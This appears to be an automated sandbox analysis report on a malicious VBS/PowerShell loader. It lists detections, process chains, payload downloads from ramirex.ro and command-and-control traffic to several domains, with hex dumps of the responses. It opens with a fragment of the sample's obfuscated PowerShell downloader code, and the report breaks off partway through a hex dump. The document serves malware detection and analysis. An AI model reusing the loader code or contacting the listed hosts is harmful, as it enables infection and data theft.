'fugtpUSkiljs.ippeeSlivorKnobk-GldesANonirgCoxiee Lag nIdenttPo.ku ';$Gem=Beshout 'Opadgh ValgtDivertcountpFortssRigm.:Be,po/vr.ss/NeoterMetheaPyramm Borti ZikkrManyreFunktx,awmi.Foredr Treso Afpu/antirRTradeu.omatt.seudsIndevcGimpmhast,re No.fbLkk,raFyrstndokhmeRecresR leg.ZabraqJustuxMidvedMinco ';$Morsomhedernes78=Beshout ' Pli.>Bemr, ';$Afskalningernes=Beshout 'Cou,tiBombaeFor,lx,obbe ';$Uniformerne='Requisites';$Generaliserede135 = Beshout 'Mn treSildecDynamhFremfo Herr Shri%Udrk a F,nspSyc.ppPasswdBadesaKok etBro,eaNedry%Stand\Skan,MBal.ie Preft istaaKrngecBidraaKlororSeashpBe hiaUlulalIleossPloto.FordoTFoto oSea akRepre Rumfr&.ltfo&Proce ViolieSeer,cInterh tdfaoT,lst Pomatt Flle ';Lovbundnes (Beshout 'Manip$NetstgDuromlCountoDeathbSalgsaStor.lSuper:AlloyBB nbrlSpe.la Linif Oketf Pro,eHals,rSydvee Kla.nAtlas=Rangl(BrokkcMal,kmAcftsdErrat Polit/GiantcDesm. 
usdy$B kagGPer.eeUro.tn fleteczardrPretea VaerlBuff,i KorpsFinureBre.srLderveSloucdR.gnbeBando1Ordna3 I,el5Fre,s) Bowl ');Lovbundnes (Beshout 'Kilde$ VaaggHumoul trusoCom,ebPagurakritelBynrt:TorsoMSkibsa derasGuimpsCentiaSenagcSuctirForhaeemmagd Cade= Amor$CardiG AvlseAcidbmChr.s.DronnsSmaltpLevnel ChariChinctBurme( Goni$BowldM.angeoS,mmer issisSterooS,vermProfihFanemeBeggadDrakme Xemer.erienextraeKonomsS.per7 amle8Verde)Kaf,e ');$Gem=$Massacred[0];$Benzyls= (Beshout ' Four$Brn gg D ggl RokaoCoarcbH.ndgaSamlel.ilgo: ReflG DispeAmar n AvereIoretr opt,iHoos c Mi daAfkrflUnderlPorceyHyper= .estNSortle RatgwSlhun-SinliO RacebDaabsjHalsseStandc lokbt .yra TilbaS Dolpyu.sprsKvag tTri,ee ResimBashe.EllarNChemie.yskutTriam.prevoW,nisoeko orbDisedCChevel routi.rende orinnBalitt');$Benzyls+=$Blafferen[1];Lovbundnes ($Benzyls);Lovbundnes (Beshout '.esen$AkuleGStratePneumn paceebe olrJut.si carmcBe.tya JnanlEmbr lTerraySjamb.FyrsvH ,evie nfela U lndH.ctoeAnteprKon asLevne[Tilst$ ,nseFBellioUnderr Ravem,reagaKo,iflOverdiTerkeaFreshe Unr r Cra.sAmour]Forch=Tvely$Ko edPCountiForstgAbonng TordyTroll ');$Clamourers=Beshout ' tran$ LiniGmaskieamphinled meOph lrGlu
No Snort rule has matched


AV Detection

Source: http://pesterbdd.com/images/Pester.png; URL Reputation: Label: malware
Source: IMG-466573885783553Folketingsmedlemmers.vbs; ReversingLabs: Detection: 13%
Source: IMG-466573885783553Folketingsmedlemmers.vbs; Virustotal: Detection: 14%
Source: Yara match; File source: 00000016.00000002.2532785700.0000000002750000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000016.00000002.2533029666.0000000002790000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000016.00000002.2529006519.00000000021A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000012.00000002.1842902275.00000000028F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000019.00000002.2534596239.00000000013E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000012.00000002.1880343761.0000000022820000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000015.00000002.2534939674.0000000002800000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 99.9% probability
Source: unknown; HTTPS traffic detected: 188.215.50.15:443 -> 192.168.2.7:49700 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 188.215.50.15:443 -> 192.168.2.7:49707 version: TLS 1.2
Source: Binary string: m.Core.pdbH\ source: powershell.exe, 0000000E.00000002.1648566451.0000000002A8A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000E.00000002.1659572964.0000000008277000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ll\System.Core.pdb source: powershell.exe, 0000000E.00000002.1659753101.00000000082D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: wab.exe, 00000012.00000002.1879835691.00000000224D0000.00000040.00001000.00020000.00000000.sdmp, wab.exe, 00000012.00000003.1740507459.000000002216D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000003.1744163245.000000002231B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: wab.exe, wab.exe, 00000012.00000002.1879835691.00000000224D0000.00000040.00001000.00020000.00000000.sdmp, wab.exe, 00000012.00000003.1740507459.000000002216D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000003.1744163245.000000002231B000.00000004.00000020.00020000.00000000.sdmp, clip.exe
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 0000000E.00000002.1659753101.00000000082BD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: clip.pdb source: wab.exe, wab.exe, 00000012.00000003.1809432291.0000000006ACC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000002.1866261345.0000000006A7C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 0000000E.00000002.1648566451.0000000002AC9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: clip.pdbGCTL source: wab.exe, 00000012.00000003.1809432291.0000000006ACC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000002.1866261345.0000000006A7C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\symbols\dll\System.Core.pdb source: powershell.exe, 0000000E.00000002.1659753101.00000000082D7000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\clip.exe; Code function: 22_2_021BB830 FindFirstFileW,FindNextFileW,FindClose,22_2_021BB830

Software Vulnerabilities

Source: C:\Windows\System32\wscript.exe; Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\SysWOW64\clip.exe; Code function: 4x nop then xor eax, eax 22_2_021A9320
Source: Joe Sandbox View; IP Address: 137.220.252.40
Source: Joe Sandbox View; IP Address: 193.37.145.73
Source: Joe Sandbox View; JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View; JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic; HTTP traffic detected: GET /Rutschebanes.qxd HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: ramirex.ro | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /HtwvlcDSFcrAhhcHdD97.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: ramirex.ro | Cache-Control: no-cache
Source: global traffic; HTTP traffic detected: GET /abt9/?Of5HNz9=nO9f1eGtjr/sKzmKQQI1Gqn0vyk6T1iYdf0G+pz4r/6P+DB2OQ61Wxj49dZSRaju4ptYBpim6kquuDHdOrdtP6hUKp5Wb66wssc3rTHo+fACwEvPa+X6vTXJYKXAx7rcdiqsO+f3J/gP&HvxX=KFLDJ HTTP/1.1 | Host: www.387mfyr.sbs | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 | Accept-Language: en-us | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Source: global traffic; HTTP traffic detected: GET /abt9/?Of5HNz9=iV9adYjvPp7RuLwaP6BmForAyDRLfg4mpsRDBpobO1h4QpcDO6+h8uyV1/sip+su221s2KGGsEsC4t0dUTAnOg7+9cTY95M3z71wQoeHgy2DqTBwSPZzUbg36nzdDZOI6y7kx7FtYrhA&HvxX=KFLDJ HTTP/1.1 | Host: www.led-svitidla.eu | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 | Accept-Language: en-us | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Source: global traffic; HTTP traffic detected: GET /abt9/?Of5HNz9=U+tTJKHHkznvwAdOTVuKaX3FkVtJQL73z6Knbsq9f/vaKulnAbb7PLKV5/tS55IHZlIFY34dfjld794ib/iuaW0ctDHRV5MOwCy1+9JCA1F7uH49s/OETdfla7HVUoCSmFvZju33t//s&HvxX=KFLDJ HTTP/1.1 | Host: www.beldecor.net | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 | Accept-Language: en-us | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Source: global traffic; DNS traffic detected: DNS query: ramirex.ro
          Source: global trafficDNS traffic detected: DNS query: www.387mfyr.sbs
          Source: global trafficDNS traffic detected: DNS query: www.led-svitidla.eu
          Source: global trafficDNS traffic detected: DNS query: www.andywork.one
          Source: global trafficDNS traffic detected: DNS query: www.slamdrops.com
          Source: global trafficDNS traffic detected: DNS query: www.beldecor.net
          Source: unknownHTTP traffic detected: POST /abt9/ HTTP/1.1Host: www.led-svitidla.euAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-usOrigin: http://www.led-svitidla.euReferer: http://www.led-svitidla.eu/abt9/Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 220User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36Data Raw: 4f 66 35 48 4e 7a 39 3d 76 58 56 36 65 6f 50 64 4a 34 37 52 68 72 59 53 48 71 56 6b 46 49 6a 66 6a 58 31 7a 64 41 46 31 70 63 52 76 45 5a 73 41 66 46 46 36 65 72 67 6b 49 59 71 6b 2b 2f 6a 62 38 63 63 37 69 2b 59 59 34 6a 31 42 78 4b 33 6c 6d 6d 34 4f 34 74 34 62 59 33 4a 54 4a 55 6a 4e 70 63 6a 61 2f 4e 45 69 79 4a 5a 6f 63 72 69 36 67 51 61 51 7a 6a 73 77 53 4f 39 64 42 73 74 46 6d 45 50 50 4e 75 4b 57 38 68 33 52 34 4c 4e 69 56 73 46 47 34 6b 78 62 71 58 4e 2b 34 59 45 46 70 6b 45 62 30 62 62 4f 2b 32 6e 45 4f 78 38 61 7a 37 6d 35 48 50 53 61 39 6b 38 71 70 6f 71 4c 32 4c 6b 36 77 52 4d 62 34 33 49 37 30 4d 6f 45 65 48 72 51 77 59 54 4e 51 67 3d 3d Data Ascii: Of5HNz9=vXV6eoPdJ47RhrYSHqVkFIjfjX1zdAF1pcRvEZsAfFF6ergkIYqk+/jb8cc7i+YY4j1BxK3lmm4O4t4bY3JTJUjNpcja/NEiyJZocri6gQaQzjswSO9dBstFmEPPNuKW8h3R4LNiVsFG4kxbqXN+4YEFpkEb0bbO+2nEOx8az7m5HPSa9k8qpoqL2Lk6wRMb43I70MoEeHrQwYTNQg==
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 01 Jun 2024 17:58:52 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to 
disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 01 Jun 2024 17:59:08 GMTServer: ApacheX-Content-Type-Options: nosniffX-XSS-Protection: 1;mode=blockContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 01 Jun 2024 17:59:11 GMTServer: ApacheX-Content-Type-Options: nosniffX-XSS-Protection: 1;mode=blockContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 01 Jun 2024 17:59:13 GMTServer: ApacheX-Content-Type-Options: nosniffX-XSS-Protection: 1;mode=blockContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 01 Jun 2024 17:59:16 GMTServer: ApacheX-Content-Type-Options: nosniffX-XSS-Protection: 1;mode=blockContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 01 Jun 2024 17:59:38 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 33 36 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 75 54 4d 6f db 38 10 bd fb 57 4c 75 c9 c5 92 62 c7 dd 66 53 db 40 1b bb 88 81 b4 09 12 15 45 8e 14 39 b2 88 50 a4 4a 52 51 0c ec 1f ca 79 7f 42 fe d8 0e 45 3b 9b 7e 9d 64 92 f3 de 9b 79 33 e3 f9 9b d5 d5 79 71 77 bd 86 8b e2 f3 25 5c 7f fd 78 b9 39 87 24 cd f3 6f 27 e7 79 be 2a 56 f1 61 96 1d 4f f2 7c fd 25 81 a4 f6 be 3d cb f3 be ef b3 fe 24 33 76 9b 17 37 79 ed 1b 35 cb 9d b7 92 fb 4c 78 91 2c 47 f3 70 07 8a e9 ed 22 a9 ec 70 81 4c d0 7d 83 9e 41 60 49 f1 7b 27 1f 16 c9 b9 d1 1e b5 4f 8b 5d 8b 09 f0 78 5a 24 1e 1f fd 40 fc 1e 78 cd ac 43 bf e8 7c 95 9e 06 aa 81 43 b3 06 17 89 35 a5 f1 ee 15 4e 1b 8d 63 6d a4 16 f8 48 df ca 28 65 fa 17 d0 6b 61 ce 78 8d 69 10 b4 46 fd c0 90 0e 4f bf 05 b5 96 6d 1b f6 87 e8 62 53 5c ae 97 b3 e3 19 7c 31 1e 3e 99 4e 8b 79 1e 2f 47 f3 fc 62 fd 61 45 c9 7f bc 5a dd d1 e7 62 b2 7c 15 44 a7 51 51 23 58 32 05 9d 47 01 c2 f0 ae 21 5f a0 67 0e 34 d1 55 81 0e 8c 06 5f 4b 07 0e ed 03 da 6c 34 bf 0e 5c 37 07 42 0d 85 35 dd c3 f3 13 c9 11 e5 25 fe cf 23 b0 61 5a 3c 3f 81 3e 62 d0 12 e9 f3 93 a7 13 15 1f e2 c1 75 16 38 46 de ee 57 62 58 eb c1 29 26 4c a4 5e ab 17 6a 03 ce 28 c9 a5 a7 47 4a 95 38 00 63 f4 f3 bf f4 0b 42 41 03 b1 14 e6 07 e6 0f ab d5 cd fa f6 76 39 fa 86 25 dc 0e 15 01 a3 8a 69 b8 4a 54 02 39 85 6b f4 00 ff 00 5c 9b 1e 2d f9 52 ee 86 77 d5 bb ac b2 c3 cb 66 75 06 25 17 6f 8f d9 e9 64 86 ec a4 9c 4e 4f 67 ef c4 c9 5f bc 9c 4e fe 2e df f1 e9 f1 84 ec 7f 11 9b e7 fb 16 e4 61 ea 97 a3 d1 fc 4d 9a 8e 00 20 85 af ba 32 d6 77 9a 79 54 bb 31 7c 96 dc 1a 67 2a 0f 35 f9 c5 84 20 7d 06 5c 21 59 0f 1a fb 08 4a 2a 64 be b3 34 bc de c0 86 86 d9 86 9c d7 8f ad 32 96 5a 04 9b 8a 5a 86 10 06 1a 4c 15 31 8c 5c b1 d6 d8 23 07 0d 3a c7 b6 08 d4 d4 c4 1b 72 af 61 4a 25 63 70 2d 72 59 49 4e a7 5d 04 
29 8a 24 2a c2 be 9d 4c c9 08 8f 6e fc ab 20 cd 10 65 a3 5d c4 48 ef c0 f4 7b b5 83 56 06 77 a6 03 4e 44 21 32 50 86 cc aa 71 84 94 9d 07 e9 29 b3 96 98 fc 8e 26 44 f2 7b fa 18 a8 68 ab c0 f5 d2 f3 9a d0 4a a1 88 88 84 72 b6 3e 56 74 d0 70 49 06 45 20 6e 90 69 ca d3 54 b4 db 1d ed f1 5e 65 10 75 35 d9 fd 13 0e 98 45 9a 44 ed c8 bd a1 dd 02 2b d6 29 9f 45 ad cd e6 16 98 ea d9 ce 1d 0a fd 19 3f 30 07 12 65 f4 36 82 50 9b 6e 5b 87 12 1a 76 8f bf f1 ac 66 6d bb 0b 09 63 04 f4 c6 de 33 da 0c aa 97 fa b2 37 c2 c9 a6 55 78 46 cb 23 86 8e 0e 1d 8c f1 87 26 92 37 35 8d 48 29 b7 54 6d 33 ec af 92 a4 38 ec 2c c9 b7 9d ab c9 dc 08 32 61 8c c2 68 54 f2 01 a1 26 b1 50 31 2d 29 f8 1e 15 5d 0d 2d 86 46 6a d9 74 cd be fe ab 17 1f 87 be 51 9b f0 91 71 af 68 2d 82 db 3b d3 1d 51 e9 96 fe 6c e5 a1 7a 2b b7 b5 a7 c5 ec 23 45 ba 1c fd 07 3d 98 bb 21 f9 05 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 36buTMo8WLubfS@E9PJRQyBE;~dy3yqw%\x9$o'y*VaO|%=$3v7y5Lx,Gp"
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 01 Jun 2024 17:59:40 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 33 36 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 75 54 4d 6f db 38 10 bd fb 57 4c 75 c9 c5 b2 ec d8 5b b4 a9 6d a0 8d bd 88 81 b4 09 12 15 45 8e b4 38 b2 88 50 a4 96 1c 45 31 d0 3f 94 f3 fe 84 fc b1 1d 8a 76 9a 7e ec 49 26 39 ef bd 99 37 33 9e bf 59 5d 9d e7 77 d7 6b b8 c8 3f 5f c2 f5 d7 4f 97 9b 73 48 d2 2c fb 36 3d cf b2 55 be 8a 0f b3 d1 78 92 65 eb 2f 09 24 15 51 73 96 65 5d d7 8d ba e9 c8 ba 5d 96 df 64 15 d5 7a 96 79 72 aa a0 91 24 99 2c 07 f3 70 07 5a 98 dd 22 29 5d 7f 81 42 f2 7d 8d 24 20 b0 a4 f8 4f ab 1e 16 c9 b9 35 84 86 d2 7c df 60 02 45 3c 2d 12 c2 47 ea 89 3f 40 51 09 e7 91 16 2d 95 e9 bb 40 d5 73 18 51 e3 22 71 76 6b c9 bf c2 19 6b 70 68 ac 32 12 1f f9 5b 5a ad 6d f7 02 7a 2d 5c 88 a2 c2 34 08 3a ab 7f 62 48 fb a7 3f 82 1a 27 76 b5 f8 9f e8 7c 93 5f ae 97 b3 f1 0c be 58 82 bf 6d 6b e4 3c 8b 97 83 79 76 b1 fe b8 e2 e4 3f 5d ad ee f8 73 31 59 be 0a e2 d3 20 af 10 